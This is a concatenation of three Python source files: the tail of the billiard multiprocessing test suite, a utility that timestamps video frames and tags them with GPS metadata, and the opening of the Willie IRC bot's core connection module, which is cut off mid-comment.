self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i * i for i in range(10)])
manager.shutdown()
_queue = Queue.Queue()
# Test of connecting to a remote server and using xmlrpclib for serialization
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def _putter(self, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
queue.put(('hello world', None, True, 2.25))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=('localhost', 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
# Note that xmlrpclib will deserialize object as a list not a tuple
self.assertEqual(queue.get(), ['hello world', None, True, 2.25])
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
manager.shutdown()
class _TestManagerRestart(BaseTestCase):
def _putter(self, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=('localhost', 0), authkey=authkey, serializer=SERIALIZER)
addr = manager.get_server().address
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
manager.start()
manager.shutdown()
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def _echo(self, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', range(4))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0] * 10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0] * 10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except billiard.BufferTooShort as exc:
self.assertEqual(exc.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = latin('X') * (1024 * 1024 * 16) # 16Mb
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(IOError, reader.send, 2)
self.assertRaises(IOError, writer.recv)
self.assertRaises(IOError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
return
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7 + 8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def _test(self, address):
conn = self.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
'''
class _TestPicklingConnections(BaseTestCase):
"""Test of sending connection and socket objects between processes"""
ALLOWED_TYPES = ('processes',)
def _listener(self, conn, families):
for fam in families:
l = self.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
if self.TYPE == 'processes':
l = socket.socket()
l.bind(('localhost', 0))
conn.send(l.getsockname())
l.listen(1)
new_conn, addr = l.accept()
conn.send(new_conn)
conn.recv()
def _remote(self, conn):
for (address, msg) in iter(conn.recv, None):
client = self.connection.Client(address)
client.send(msg.upper())
client.close()
if self.TYPE == 'processes':
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
try:
billiard.allow_connection_pickling()
except ImportError:
return
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
if self.TYPE == 'processes':
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
if hasattr(socket, 'fromfd'):
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(100), msg.upper())
else:
# XXX On Windows with Py2.6 need to backport fromfd()
discard = lconn.recv_bytes()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
'''
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# create and destroy lots of blocks of different sizes
for i in xrange(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = billiard.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
# get the heap object
heap = billiard.heap.BufferWrapper._heap
# verify the state of the heap
all = []
occupied = 0
for L in heap._len_to_seq.values():
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop - start, 'free'))
for arena, start, stop in heap._allocated_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop - start, 'occupied'))
occupied += stop - start
all.sort()
for i in range(len(all) - 1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i + 1][:3]
self.assertTrue((arena != narena and nstart == 0) or
(stop == nstart))
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def _double(self, x, y, foo, arr, string):
x.value *= 2
y.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
@unittest.skipIf(Value is None, "requires ctypes.Value")
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0 / 3.0, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', range(10), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = 'hello'
p = self.Process(target=self._double, args=(x, y, foo, arr, string))
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0 / 3.0)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i * 2)
self.assertEqual(string.value, latin('hellohello'))
@unittest.skipIf(Value is None, "requires ctypes.Value")
def test_synchronize(self):
self.test_sharedctypes(lock=True)
@unittest.skipIf(ctypes_copy is None, "requires ctypes.copy")
def test_copy(self):
foo = _Foo(2, 5.0)
bar = ctypes_copy(foo)
foo.x = 0
foo.y = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def _test_finalize(self, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call mutliprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
class _TestImportStar(BaseTestCase):
"""Test that from ... import * works for each module"""
ALLOWED_TYPES = ('processes',)
def test_import(self):
modules = [
'billiard', 'billiard.connection',
'billiard.heap', 'billiard.managers',
'billiard.pool', 'billiard.process',
'billiard.reduction',
'billiard.synchronize', 'billiard.util'
]
if c_int is not None:
# This module requires _ctypes
modules.append('billiard.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
for attr in getattr(mod, '__all__', ()):
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
class _TestLogging(BaseTestCase):
"""Quick test that logging works -- does not test logging output"""
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = billiard.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
def _test_level(self, conn):
logger = billiard.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = billiard.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = billiard.Pipe(duplex=False)
logger.setLevel(LEVEL1)
self.Process(target=self._test_level, args=(writer,)).start()
self.assertEqual(LEVEL1, reader.recv())
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
self.Process(target=self._test_level, args=(writer,)).start()
self.assertEqual(LEVEL2, reader.recv())
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == billiard.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'billiard.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = _billiard.Connection(44977608)
self.assertRaises(IOError, conn.poll)
self.assertRaises(IOError, _billiard.Connection, -1)
def get_attributes(Source, names):
d = {}
for name in names:
obj = getattr(Source, name)
if type(obj) == type(get_attributes):
obj = staticmethod(obj)
d[name] = obj
return d
def create_test_cases(Mixin, type):
result = {}
glob = globals()
Type = type.capitalize()
for name in glob.keys():
if name.startswith('_Test'):
base = glob[name]
if type in base.ALLOWED_TYPES:
newname = 'With' + Type + name[1:]
class Temp(base, unittest.TestCase, Mixin):
pass
result[newname] = Temp
Temp.__name__ = newname
Temp.__module__ = Mixin.__module__
return result
class ProcessesMixin(object):
TYPE = 'processes'
Process = billiard.Process
locals().update(get_attributes(billiard, (
'Queue', 'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore',
'Condition', 'Event', 'Value', 'Array', 'RawValue',
'RawArray', 'current_process', 'active_children', 'Pipe',
'connection', 'JoinableQueue'
)))
testcases_processes = create_test_cases(ProcessesMixin, type='processes')
globals().update(testcases_processes)
class ManagerMixin(object):
TYPE = 'manager'
Process = billiard.Process
manager = object.__new__(billiard.managers.SyncManager)
locals().update(get_attributes(manager, (
'Queue', 'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore',
'Condition', 'Event', 'Value', 'Array', 'list', 'dict',
'Namespace', 'JoinableQueue'
)))
testcases_manager = create_test_cases(ManagerMixin, type='manager')
globals().update(testcases_manager)
class ThreadsMixin(object):
TYPE = 'threads'
Process = billiard.dummy.Process
locals().update(get_attributes(billiard.dummy, (
'Queue', 'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore',
'Condition', 'Event', 'Value', 'Array', 'current_process',
'active_children', 'Pipe', 'connection', 'dict', 'list',
'Namespace', 'JoinableQueue'
)))
testcases_threads = create_test_cases(ThreadsMixin, type='threads')
globals().update(testcases_threads)
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return bytes('something bogus')
def send_bytes(self, data):
pass
self.assertRaises(billiard.AuthenticationError,
billiard.connection.deliver_challenge,
_FakeConnection(), bytes('abc'))
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return billiard.connection.CHALLENGE
elif self.count == 2:
return bytes('something bogus')
return bytes('')
def send_bytes(self, data):
pass
self.assertRaises(billiard.AuthenticationError,
billiard.connection.answer_challenge,
_FakeConnection(), bytes('abc'))
def initializer(ns):
ns.test += 1
class TestInitializers(unittest.TestCase):
"""Test Manager.start()/Pool.__init__() initializer feature
- see issue 5585
"""
def setUp(self):
self.mgr = billiard.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
def test_manager_initializer(self):
m = billiard.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
def test_pool_initializer(self):
self.assertRaises(TypeError, billiard.Pool, initializer=1)
p = billiard.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
def _ThisSubProcess(q):
try:
q.get(block=False)
except Queue.Empty:
pass
def _TestProcess(q):
"""Issue 5155, 5313, 5331: Test process in processes
Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
"""
queue = billiard.Queue()
subProc = billiard.Process(target=_ThisSubProcess, args=(queue,))
subProc.start()
subProc.join()
def _afunc(x):
return x * x
def pool_in_process():
pool = billiard.Pool(processes=4)
pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
queue = billiard.Queue()
proc = billiard.Process(target=_TestProcess, args=(queue,))
proc.start()
proc.join()
def test_pool_in_process(self):
p = billiard.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = billiard.Process(target=lambda: flike.flush())
self.assertTrue(proc)
flike.flush()
assert sio.getvalue() == 'foo'
testcases_other = [OtherTest, TestInvalidHandle, TestInitializers,
TestStdinBadfiledescriptor]
def test_main(run=None):
if sys.platform.startswith("linux"):
try:
billiard.RLock()
except OSError:
raise SkipTest("OSError raises on RLock creation, see issue 3111!")
if run is None:
from test.test_support import run_unittest as run
util.get_temp_dir() # creates temp directory for use by all processes
billiard.get_logger().setLevel(LOG_LEVEL)
ProcessesMixin.pool = billiard.Pool(4)
ThreadsMixin.pool = billiard.dummy.Pool(4)
ManagerMixin.manager.__init__()
ManagerMixin.manager.start()
ManagerMixin.pool = ManagerMixin.manager.Pool(4)
testcases = (
sorted(testcases_processes.values(), key=lambda tc: tc.__name__) +
sorted(testcases_threads.values(), key=lambda tc: tc.__name__) +
sorted(testcases_manager.values(), key=lambda tc: tc.__name__) +
testcases_other
)
loadTestsFromTestCase = unittest.defaultTestLoader.loadTestsFromTestCase
suite = unittest.TestSuite(loadTestsFromTestCase(tc) for tc in testcases)
# (ncoghlan): Whether or not sys.exc_clear is executed by the threading
# module during these tests is at least platform dependent and possibly
# non-deterministic on any given platform. So we don't mind if the listed
# warnings aren't actually raised.
with test_support.check_py3k_warnings(
(".+__(get|set)slice__ has been removed", DeprecationWarning),
(r"sys.exc_clear\(\) not supported", DeprecationWarning),
quiet=True):
run(suite)
ThreadsMixin.pool.terminate()
ProcessesMixin.pool.terminate()
ManagerMixin.pool.terminate()
ManagerMixin.manager.shutdown()
del ProcessesMixin.pool, ThreadsMixin.pool, ManagerMixin.pool
def main():
test_main(unittest.TextTestRunner(verbosity=2).run)
if __name__ == '__main__':
main()
|
vtk.py
|
# -*- coding: utf-8 -*-
"""
Created on Wed Aug 19 19:50:43 2020
@author: beck
"""
import cv2
import datetime
import dateparser
import os
import sys
import pandas as pd
import pytz
from hachoir.parser import createParser
from hachoir.metadata import extractMetadata
from PIL import Image
import numpy as np
import pytesseract
import imutils
import time
from GPSPhoto import gpsphoto
from threading import Thread
def firstFrame(video):
if 'timestamp_frame' not in os.listdir(os.getcwd()):
os.mkdir('timestamp_frame/')
video_capture = cv2.VideoCapture(video)
file = 'timestamp_frame/'+video+'_'+ str(0)+'.jpg'
while(True):
ret, frame = video_capture.read()
if not ret:
break
im = frame
break
video_capture.release()
PIL_image = Image.fromarray(im.astype('uint8'), 'RGB')
return PIL_image
def formatFrame(image, LEFT = 50, TOP = 20, RIGHT = 250, BOTTOM = 90):
image = image.crop((LEFT, TOP, RIGHT, BOTTOM))
image = np.array(image.convert('RGB'))[:, :, ::-1].copy()
image = imutils.resize(image, width=500)
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
thresh = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)[1]
return thresh
def getCreationDate(filename, config):
if config == 'trident':
pytesseract.pytesseract.tesseract_cmd = 'Tesseract-OCR\\tesseract.exe'
image = formatFrame(firstFrame(filename))
data = pytesseract.image_to_string(image, lang='eng',config='--psm 6')
data_str = str(data).split('\n')
metadata = dateparser.parse(data_str[0]+ ' '+data_str[1])
else:
parser = createParser(filename)
metadata = extractMetadata(parser).get('creation_date')
return metadata
def getOffsets(file):
#GET DELTA SECONDS FOR EVERY FRAME
cap = cv2.VideoCapture(file)
totalframes = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
fps = int(cap.get(cv2.CAP_PROP_FPS))
offsets = [0]
for i in range(totalframes-1):
offsets.append(offsets[-1]+1000/fps)
offsets = [datetime.timedelta(milliseconds=i) for i in offsets]
return offsets
def getTimestamps(file, config):
offsets = getOffsets(file)
creationdate = getCreationDate(file, config)
#CALCULATE TIMESTAMPS
timestamps = [(creationdate+offset).replace(tzinfo = pytz.timezone('UTC')) for offset in offsets]
#GENERATE FRAME NAMES
frames = [file.split('/')[-1]+'_'+str(i)+'.jpg' for i in range(len(timestamps))]
#EXPORT DATA AS CSV
df = pd.DataFrame()
df['Frame'] = frames
df['Timestamp'] = timestamps
return df
def getFps(file):
cap = cv2.VideoCapture(file)
return int(cap.get(cv2.CAP_PROP_FPS))
class Writer:
def __init__(self, stream, export_path, taggedDF, parent, controller):
self.taggedDF = taggedDF.reset_index()
self.export_path = export_path
self.taggedList = [self.taggedDF.loc[i,'Frame'] for i in range(len(self.taggedDF['Frame']))]
self.frame_inds = [int(i.split('.')[1].split('_')[1]) for i in self.taggedList]
self.parent = parent
self.controller = controller
self.stream = cv2.VideoCapture(stream)
self.thread = Thread(target=self.write, args=())
self.thread.setDaemon(True)
def write(self):
i = 0
for frame_ind in self.frame_inds:
self.stream.set(cv2.CAP_PROP_POS_FRAMES, frame_ind)
(grabbed, frame) = self.stream.read()
frame_path = self.export_path+self.taggedList[self.frame_inds.index(frame_ind)]
cv2.imwrite(frame_path, frame)
#ADD METADATA
photo = gpsphoto.GPSPhoto(frame_path)
info = gpsphoto.GPSInfo((self.taggedDF.loc[i, 'Latitude'],
self.taggedDF.loc[i, 'Longitude']),
timeStamp=self.taggedDF.loc[i, 'Timestamp'],
alt=int(self.taggedDF.loc[i, 'Elevation']))
photo.modGPSData(info, frame_path)
self.parent.num+=1
i+=1
self.parent.e_status.set('Writing: '+str(self.parent.num)+'/'+str(self.parent.denom))
self.stream.release()
return
def createFrames(path, export_path, taggedDF, parent, controller):
x = len(taggedDF)
a = int(round(x/3))
b = int(a*2)
writer1 = Writer(path, export_path, taggedDF.iloc[:a], parent, controller)
writer2 = Writer(path, export_path, taggedDF.iloc[a:b], parent, controller)
writer3 = Writer(path, export_path, taggedDF.iloc[b:], parent, controller)
writer1.thread.start()
writer2.thread.start()
writer3.thread.start()
writer1.thread.join()
writer2.thread.join()
writer3.thread.join()
parent.e_status.set('Done')
|
irc.py
|
# coding=utf8
"""
irc.py - An Utility IRC Bot
Copyright 2008, Sean B. Palmer, inamidst.com
Copyright 2012, Edward Powell, http://embolalia.net
Copyright © 2012, Elad Alfassa <elad@fedoraproject.org>
Licensed under the Eiffel Forum License 2.
Willie: http://willie.dftba.net/
When working on core IRC protocol related features, consult protocol
documentation at http://www.irchelp.org/irchelp/rfc/
"""
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import absolute_import
import sys
import re
import time
import socket
import asyncore
import asynchat
import os
import codecs
import traceback
from willie.tools import stderr, Nick
try:
import select
import ssl
has_ssl = True
except ImportError:
# no SSL support
has_ssl = False
if has_ssl:
if not hasattr(ssl, 'match_hostname'):
# Attempt to import ssl_match_hostname from python-backports
import backports.ssl_match_hostname
ssl.match_hostname = backports.ssl_match_hostname.match_hostname
ssl.CertificateError = backports.ssl_match_hostname.CertificateError
import errno
import threading
from datetime import datetime
if sys.version_info.major >= 3:
unicode = str
class Origin(object):
source = re.compile(r'([^!]*)!?([^@]*)@?(.*)')
def __init__(self, bot, source, args, tags):
self.hostmask = source
self.tags = tags
# Split out the nick, user, and host from hostmask per the regex above.
match = Origin.source.match(source or '')
self.nick, self.user, self.host = match.groups()
self.nick = Nick(self.nick)
# If we have more than one argument, the second one is the sender
if len(args) > 1:
target = Nick(args[1])
else:
target = None
# Unless we're messaging the bot directly, in which case that second
# arg will be our bot's name.
if target and target.lower() == bot.nick.lower():
target = self.nick
self.sender = target
class Bot(asynchat.async_chat):
def __init__(self, config):
ca_certs = '/etc/pki/tls/cert.pem'
if config.ca_certs is not None:
ca_certs = config.ca_certs
elif not os.path.isfile(ca_certs):
ca_certs = '/etc/ssl/certs/ca-certificates.crt'
if not os.path.isfile(ca_certs):
stderr('Could not open CA certificates file. SSL will not '
'work properly.')
if config.log_raw is None:
# Default is to log raw data, can be disabled in config
config.log_raw = True
asynchat.async_chat.__init__(self)
self.set_terminator(b'\n')
self.buffer = ''
self.nick = Nick(config.nick)
"""Willie's current ``Nick``. Changing this while Willie is running is
untested."""
self.user = config.user
"""Willie's user/ident."""
self.name = config.name
"""Willie's "real name", as used for whois."""
self.channels = []
"""The list of channels Willie is currently in."""
self.stack = {}
self.ca_certs = ca_certs
self.hasquit = False
self.sending = threading.RLock()
self.writing_lock = threading.Lock()
self.raw = None
# Right now, only accounting for two op levels.
# This might be expanded later.
# These lists are filled in startup.py, as of right now.
self.ops = dict()
"""
A dictionary mapping channels to a ``Nick`` list of their operators.
"""
self.halfplus = dict()
"""
A dictionary mapping channels to a ``Nick`` list of their half-ops and
ops.
"""
self.voices = dict()
"""
A dictionary mapping channels to a ``Nick`` list of their voices,
half-ops and ops.
"""
# We need this to prevent error loops in handle_error
self.error_count = 0
self.connection_registered = False
""" Set to True when a server has accepted the client connection and
messages can be sent and received. """
def log_raw(self, line, prefix):
"""Log raw line to the raw log."""
if not self.config.core.log_raw:
return
if not self.config.core.logdir:
self.config.core.logdir = os.path.join(self.config.dotdir,
'logs')
if not os.path.isdir(self.config.core.logdir):
try:
os.mkdir(self.config.core.logdir)
except Exception as e:
stderr('There was a problem creating the logs directory.')
stderr('%s %s' % (str(e.__class__), str(e)))
stderr('Please fix this and then run Willie again.')
os._exit(1)
f = codecs.open(os.path.join(self.config.core.logdir, 'raw.log'),
'a', encoding='utf-8')
f.write(prefix + unicode(time.time()) + "\t")
temp = line.replace('\n', '')
f.write(temp)
f.write("\n")
f.close()
def safe(self, string):
"""Remove newlines from a string."""
if sys.version_info.major >= 3 and isinstance(string, bytes):
string = string.decode('utf8')
elif sys.version_info.major < 3:
if not isinstance(string, unicode):
string = unicode(string, encoding='utf8')
string = string.replace('\n', '')
string = string.replace('\r', '')
return string
def write(self, args, text=None):
"""Send a command to the server.
``args`` is an iterable of strings, which are joined by spaces.
``text`` is treated as though it were the final item in ``args``, but
is preceeded by a ``:``. This is a special case which means that
``text``, unlike the items in ``args`` may contain spaces (though this
constraint is not checked by ``write``).
In other words, both ``willie.write(('PRIVMSG',), 'Hello, world!')``
and ``willie.write(('PRIVMSG', ':Hello, world!'))`` will send
``PRIVMSG :Hello, world!`` to the server.
Newlines and carriage returns ('\\n' and '\\r') are removed before
sending. Additionally, if the message (after joining) is longer than
than 510 characters, any remaining characters will not be sent.
"""
args = [self.safe(arg) for arg in args]
if text is not None:
text = self.safe(text)
try:
self.writing_lock.acquire() # Blocking lock, can't send two things
# at a time
# From RFC2812 Internet Relay Chat: Client Protocol
# Section 2.3
#
# https://tools.ietf.org/html/rfc2812.html
#
# IRC messages are always lines of characters terminated with a
# CR-LF (Carriage Return - Line Feed) pair, and these messages SHALL
# NOT exceed 512 characters in length, counting all characters
# including the trailing CR-LF. Thus, there are 510 characters
# maximum allowed for the command and its parameters. There is no
# provision for continuation of message lines.
if text is not None:
temp = (' '.join(args) + ' :' + text)[:510] + '\r\n'
else:
temp = ' '.join(args)[:510] + '\r\n'
self.log_raw(temp, '>>')
self.send(temp.encode('utf-8'))
finally:
self.writing_lock.release()
def run(self, host, port=6667):
try:
self.initiate_connect(host, port)
except socket.error as e:
stderr('Connection error: %s' % e)
self.hasquit = True
def initiate_connect(self, host, port):
stderr('Connecting to %s:%s...' % (host, port))
source_address = ((self.config.core.bind_host, 0)
if self.config.core.bind_host else None)
self.set_socket(socket.create_connection((host, port),
source_address=source_address))
if self.config.core.use_ssl and has_ssl:
self.send = self._ssl_send
self.recv = self._ssl_recv
elif not has_ssl and self.config.core.use_ssl:
stderr('SSL is not avilable on your system, attempting connection '
'without it')
self.connect((host, port))
try:
asyncore.loop()
except KeyboardInterrupt:
print('KeyboardInterrupt')
self.quit('KeyboardInterrupt')
def quit(self, message):
"""Disconnect from IRC and close the bot."""
self.write(['QUIT'], message)
self.hasquit = True
# Wait for acknowledgement from the server. By RFC 2812 it should be
# an ERROR msg, but many servers just close the connection. Either way
# is fine by us.
# Closing the connection now would mean that stuff in the buffers that
# has not yet been processed would never be processed. It would also
# release the main thread, which is problematic because whomever called
# quit might still want to do something before main thread quits.
def handle_close(self):
self.connection_registered = False
self._shutdown()
stderr('Closed!')
# This will eventually call asyncore dispatchers close method, which
